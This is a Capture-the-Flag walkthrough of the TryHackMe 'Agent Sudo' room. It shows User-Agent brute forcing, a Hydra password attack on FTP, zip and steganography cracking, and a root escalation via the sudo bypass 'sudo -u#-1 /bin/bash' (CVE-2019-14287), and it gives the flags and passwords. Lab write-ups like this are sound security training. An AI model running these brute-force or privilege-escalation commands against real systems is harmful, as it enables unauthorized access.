Agent Sudo — Try Hack Me Room
Task 2 Enumerate
How many open ports?
How you redirect yourself to a secret page?
Main page shows that “use your Codename as User-agent”. One of the use’s Code name is Agent R therefore let’s assume all the Agent’s code name represent 26 letters of Alphabet.
So the Answer is user-agent
What is the agent name?
hint-You might face problem on using Firefox. Try ‘user agent switcher’ plugin with user agent: C
The given hint shows that changing the User-Agent in the request must redirect to another webpage.
First step is to capture the request via Burp and send it to the intruder to further investigation.
Then select the User-Agent and create a brute force attack which contain full English Alphabet
When its running Letter C, status code is Change to 302 which mean redirect
to another URL.
In the Response request has a variable call Location it has a URL
This is the message that shows in that URL
Task 3 Hash cracking and brute-force
FTP password
In the above task we got the username and now we need run Brute force attack using Hydra to get the Password
Command → hydra -l Chris -P /usr/share/wordlists/rockyou.txt ftp://10.10.117.53
So The Password is crystal
Zip file password
Now we Have the username and the password.
Lets now login to the ftp server.
There are 3 file to download Run the Command Get <FILE_NAME>
In Hint it mention that Password is Hidden in the Image files.
Let’s use Binwalk to extract the images
After extraction of the image. There will be a Zip file protected by password.
Let’s use Zip2john to get the Hash of the Zip and using that we can crack the password.
steg password
Now we know the Password lets run the command 7z e <zip_file> to unzip the file
when it is unzip there will be a file call To_agentR.txt
When it is open you can see there is message for agent C a.k.a Chris
To_agentR.txt file had some encoded password. Using Cyberchef we can get the password for that.
Who is the other agent (in full name)?
James
SSH password
We can use the password we obtain from the previous step to get the SSH password. Password hid inside the image. Using steghide secret massage can be extract.
Password is Hackerrules!
Task 4 Capture the user flag
Now Lets login to the system using SSH
there are 2 files in the James home DIR one is USER.TXT and another one is Alien_autospy.jpg
FLAG — b03d975e8c92a7c04146cfa7a5a317
Now let’s Download the that image using below command
scp username@<IP>:<FILE_NAME> <DOWNLAOD_PATH>
To find out the name of the Image article. we need to upload it to Google’s image search engine. This is the article that mention in the internet
What is the incident of the photo called?
Roswell Alien autopsy
Task 5 Privilege escalation
Lets Run sudo -l to find out what type of programs that James can run with SUDO privileges
The Sudo version That run in the James machine is 1.8.21p2. It’s a old version of sudo. lets try to find an exploit for this vulnerability
Doing some research in the google I was able to find an exploit for this, link is provided here
To get the root access need to run this command
sudo -u#-1 /bin/bash
CVE number for the escalation
CVE-2019–14287
What is the root flag?
b53a02f55b57d4439e3341834d70c062
(Bonus) Who is Agent R?
DesKel
